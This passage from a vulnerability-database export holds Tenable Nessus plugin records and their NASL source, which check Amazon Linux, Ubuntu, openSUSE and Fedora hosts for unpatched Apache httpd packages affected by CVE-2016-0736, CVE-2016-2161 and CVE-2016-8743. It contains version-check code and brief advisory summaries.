An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. (CVE-2016-8743)\n\n - A CRLF injection allowing HTTP response splitting attacks for \n sites which use mod_userdir (CVE-2016-4975)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/dev/dist/Announcement2.4.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/apache/httpd/blob/2.4.x/CHANGES\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.apache.org/security/asf-httpoxy-response.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpoxy.org\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.25 or later.\n\nNote that the 'httpoxy' vulnerability can be mitigated by applying the\nworkarounds or patches as referenced in the vendor advisory\nasf-httpoxy-response.txt. 
Furthermore, to mitigate the other\nvulnerabilities, ensure that the affected modules (mod_session_crypto,\nmod_auth_digest, and mod_http2) are not in use.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5387\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\n\napp_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nconstraints = [\n { \"min_version\":\"2.3.0\", \"fixed_version\":\"2.4.25\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T01:21:30", "description": "The following security-related issues were fixed :\n\nPadding oracle vulnerability in Apache mod_session_crypto\n(CVE-2016-0736)\n\nDoS vulnerability in mod_auth_digest (CVE-2016-2161)\n\nApache HTTP request parsing whitespace defects (CVE-2016-8743)", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-01-20T00:00:00", "title": "Amazon Linux AMI : httpd24 (ALAS-2017-785)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:mod24_ssl", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-785.NASL", "href": "https://www.tenable.com/plugins/nessus/96631", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-785.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96631);\n 
script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_xref(name:\"ALAS\", value:\"2017-785\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 (ALAS-2017-785)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following security-related issues were fixed :\n\nPadding oracle vulnerability in Apache mod_session_crypto\n(CVE-2016-0736)\n\nDoS vulnerability in mod_auth_digest (CVE-2016-2161)\n\nApache HTTP request parsing whitespace defects (CVE-2016-8743)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-785.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd24' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-debuginfo-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-devel-2.4.25-1.68.amzn1\")) 
flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-manual-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-tools-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ldap-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_proxy_html-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_session-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ssl-2.4.25-1.68.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd24 / httpd24-debuginfo / httpd24-devel / httpd24-manual / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-02-01T07:22:40", "description": "It was discovered that the Apache mod_session_crypto module was\nencrypting data and cookies using either CBC or ECB modes. A remote\nattacker could possibly use this issue to perform padding oracle\nattacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module\nincorrectly handled malicious input. A remote attacker could possibly\nuse this issue to cause Apache to crash, resulting in a denial of\nservice. (CVE-2016-2161)\n\nDavid Dennerline and Regis Leroy discovered that the Apache HTTP\nServer incorrectly handled unusual whitespace when parsing requests,\ncontrary to specifications. When being used in combination with a\nproxy or backend server, a remote attacker could possibly use this\nissue to perform an injection attack and pollute cache. This update\nmay introduce compatibility issues with clients that do not strictly\nfollow HTTP protocol specifications. 
A new configuration option\n'HttpProtocolOptions Unsafe' can be used to revert to the previous\nunsafe behaviour in problematic environments. (CVE-2016-8743).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 31, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-05-10T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : apache2 vulnerabilities (USN-3279-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:apache2-bin", "cpe:/o:canonical:ubuntu_linux:16.10", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3279-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100098", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3279-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100098);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_xref(name:\"USN\", value:\"3279-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : apache2 vulnerabilities (USN-3279-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Apache mod_session_crypto module was\nencrypting data and cookies using either CBC or ECB modes. A remote\nattacker could possibly use this issue to perform padding oracle\nattacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module\nincorrectly handled malicious input. A remote attacker could possibly\nuse this issue to cause Apache to crash, resulting in a denial of\nservice. (CVE-2016-2161)\n\nDavid Dennerline and Regis Leroy discovered that the Apache HTTP\nServer incorrectly handled unusual whitespace when parsing requests,\ncontrary to specifications. When being used in combination with a\nproxy or backend server, a remote attacker could possibly use this\nissue to perform an injection attack and pollute cache. This update\nmay introduce compatibility issues with clients that do not strictly\nfollow HTTP protocol specifications. A new configuration option\n'HttpProtocolOptions Unsafe' can be used to revert to the previous\nunsafe behaviour in problematic environments. (CVE-2016-8743).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3279-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-bin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.7-1ubuntu4.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.18-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"apache2-bin\", pkgver:\"2.4.18-2ubuntu4.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-bin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T12:32:28", "description": "This update for apache2 fixes the following security issues :\n\nSecurity issues fixed :\n\n - CVE-2016-0736: Protect mod_session_crypto data with a\n MAC to prevent padding oracle attacks (bsc#1016712).\n\n - CVE-2016-2161: Malicious input to mod_auth_digest could\n have caused the 
server to crash, resulting in DoS\n (bsc#1016714).\n\n - CVE-2016-8743: Added new directive 'HttpProtocolOptions\n Strict' to avoid proxy chain misinterpretation\n (bsc#1016715).\n\nBugfixes :\n\n - Add missing copy of hcuri and hcexpr from the worker to\n the health check worker (bsc#1019380).\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-04-03T00:00:00", "title": "openSUSE Security Update : apache2 (openSUSE-2017-416)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "modified": "2017-04-03T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-event", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "p-cpe:/a:novell:opensuse:apache2", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-event-debuginfo"], "id": "OPENSUSE-2017-416.NASL", "href": "https://www.tenable.com/plugins/nessus/99154", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-416.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99154);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", 
\"CVE-2016-8743\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-2017-416)\");\n script_summary(english:\"Check for the openSUSE-2017-416 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes the following security issues :\n\nSecurity issues fixed :\n\n - CVE-2016-0736: Protect mod_session_crypto data with a\n MAC to prevent padding oracle attacks (bsc#1016712).\n\n - CVE-2016-2161: Malicious input to mod_auth_digest could\n have caused the server to crash, resulting in DoS\n (bsc#1016714).\n\n - CVE-2016-8743: Added new directive 'HttpProtocolOptions\n Strict' to avoid proxy chain misinterpretation\n (bsc#1016715).\n\nBugfixes :\n\n - Add missing copy of hcuri and hcexpr from the worker to\n the health check worker (bsc#1019380).\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016712\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1019380\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-debuginfo-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-debugsource-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-devel-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-event-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-event-debuginfo-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-example-pages-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-prefork-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-prefork-debuginfo-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-utils-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-utils-debuginfo-2.4.23-8.3.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.2\", reference:\"apache2-worker-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-worker-debuginfo-2.4.23-8.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:14:50", "description": "Security fix for CVE-2016-8743, CVE-2016-2161, CVE-2016-0736\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 22, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-12-27T00:00:00", "title": "Fedora 24 : httpd (2016-d22f50d985)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "modified": "2016-12-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-D22F50D985.NASL", "href": "https://www.tenable.com/plugins/nessus/96114", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-d22f50d985.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96114);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n 
script_xref(name:\"FEDORA\", value:\"2016-d22f50d985\");\n\n script_name(english:\"Fedora 24 : httpd (2016-d22f50d985)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-8743, CVE-2016-2161, CVE-2016-0736\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-d22f50d985\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 